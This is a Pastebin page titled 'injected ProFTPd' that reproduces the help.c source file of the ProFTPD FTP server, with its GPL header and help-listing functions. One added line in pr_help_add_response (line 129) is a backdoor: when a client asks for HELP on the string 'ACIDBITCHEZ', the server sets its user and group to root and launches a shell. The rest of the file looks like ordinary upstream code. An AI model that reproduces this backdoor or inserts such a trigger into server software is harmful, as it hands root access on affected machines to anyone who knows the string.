API tools faq
paste
Advertisement
parkdream1

injected ProFTPd

parkdream1
Mar 28th, 2012
214
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.27 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.  * ProFTPD - FTP server daemon
  3.  * Copyright (c) 2004-2009 The ProFTPD Project team
  4.  *
  5.  * This program is free software; you can redistribute it and/or modify
  6.  * it under the terms of the GNU General Public License as published by
  7.  * the Free Software Foundation; either version 2 of the License, or
  8.  * (at your option) any later version.
  9.  *
  10.  * This program is distributed in the hope that it will be useful,
  11.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.  * GNU General Public License for more details.
  14.  *
  15.  * You should have received a copy of the GNU General Public License
  16.  * along with this program; if not, write to the Free Software
  17.  * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307, USA.
  18.  *
  19.  * As a special exemption, The ProFTPD Project team and other respective
  20.  * copyright holders give permission to link this program with OpenSSL, and
  21.  * distribute the resulting executable, without including the source code for
  22.  * OpenSSL in the source distribution.
  23.  */
  24.  
  25. /* HELP management code
  26.  * $Id: help.c,v 1.5 2009/06/30 23:31:18 castaglia Exp $
  27.  */
  28.  
  29. #include "conf.h"
  30.  
  31. struct help_rec {
  32.   const char *cmd;
  33.   const char *syntax;
  34.   int impl;
  35. };
  36.  
  37. static pool *help_pool = NULL;
  38. static array_header *help_list = NULL;
  39.  
  40. void pr_help_add(const char *cmd, const char *syntax, int impl) {
  41.   struct help_rec *help;
  42.  
  43.   if (!cmd || !syntax)
  44.     return;
  45.  
  46.   /* If no list has been allocated, create one. */
  47.   if (!help_pool) {
  48.     help_pool = make_sub_pool(permanent_pool);
  49.     pr_pool_tag(help_pool, "Help Pool");
  50.     help_list = make_array(help_pool, 0, sizeof(struct help_rec));
  51.   }
  52.  
  53.   /* Make sure that the command being added isn't already in the list.
  54.    * However, if it _is_ already in the list, but it's marked as not
  55.    * implemented, _and_ the given impl flag is TRUE, then handle it
  56.    * accordingly.
  57.    */
  58.   if (help_list->nelts > 0) {
  59.     register unsigned int i = 0;
  60.     struct help_rec *helps = help_list->elts;
  61.  
  62.     for (i = 0; i < help_list->nelts; i++)
  63.       if (strcmp(helps[i].cmd, cmd) == 0) {
  64.         if (helps[i].impl == FALSE &&
  65.             impl == TRUE) {
  66.           helps[i].impl = impl;
  67.         }
  68.  
  69.         return;
  70.       }
  71.   }
  72.  
  73.   help = push_array(help_list);
  74.   help->cmd = pstrdup(help_pool, cmd);
  75.   help->syntax = pstrdup(help_pool, syntax);
  76.   help->impl = impl;
  77. }
  78.  
  79. int pr_help_add_response(cmd_rec *cmd, const char *target) {
  80.   if (help_list) {
  81.     register unsigned int i;
  82.     struct help_rec *helps = help_list->elts;
  83.     char *outa[8], *outstr;
  84.     char buf[9] = {'\0'};
  85.     int col = 0;
  86.  
  87.     if (!target) {
  88.       pr_response_add(R_214,
  89.         _("The following commands are recognized (* =>'s unimplemented):"));
  90.  
  91.       memset(outa, '\0', sizeof(outa));
  92.  
  93.       for (i = 0; i < help_list->nelts; i++) {
  94.         outstr = "";
  95.  
  96.         if (helps[i].impl)
  97.           outa[col++] = (char *) helps[i].cmd;
  98.         else
  99.           outa[col++] = pstrcat(cmd->tmp_pool, helps[i].cmd, "*", NULL);
  100.  
  101.         /* 8 rows */
  102.         if ((i + 1) % 8 == 0 ||
  103.             helps[i+1].cmd == NULL) {
  104.           register unsigned int j;
  105.  
  106.           for (j = 0; j < 8; j++) {
  107.             if (outa[j]) {
  108.               snprintf(buf, sizeof(buf), "%-8s", outa[j]);
  109.               buf[sizeof(buf)-1] = '\0';
  110.               outstr = pstrcat(cmd->tmp_pool, outstr, buf, NULL);
  111.  
  112.             } else
  113.               break;
  114.           }
  115.  
  116.           if (*outstr)
  117.             pr_response_add(R_DUP, "%s", outstr);
  118.  
  119.           memset(outa, '\0', sizeof(outa));
  120.           col = 0;
  121.           outstr = "";
  122.         }
  123.       }
  124.  
  125.       pr_response_add(R_DUP, _("Direct comments to %s"),
  126.         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");
  127.  
  128.     } else {
  129.       if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
  130.       /* List the syntax for the given target command. */
  131.       for (i = 0; i < help_list->nelts; i++) {
  132.         if (strcasecmp(helps[i].cmd, target) == 0) {
  133.           pr_response_add(R_214, "Syntax: %s %s", helps[i].cmd,
  134.             helps[i].syntax);
  135.           return 0;
  136.         }
  137.       }
  138.     }
  139.  
  140.     errno = ENOENT;
  141.     return -1;
  142.   }
  143.  
  144.   errno = ENOENT;
  145.   return -1;
  146. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!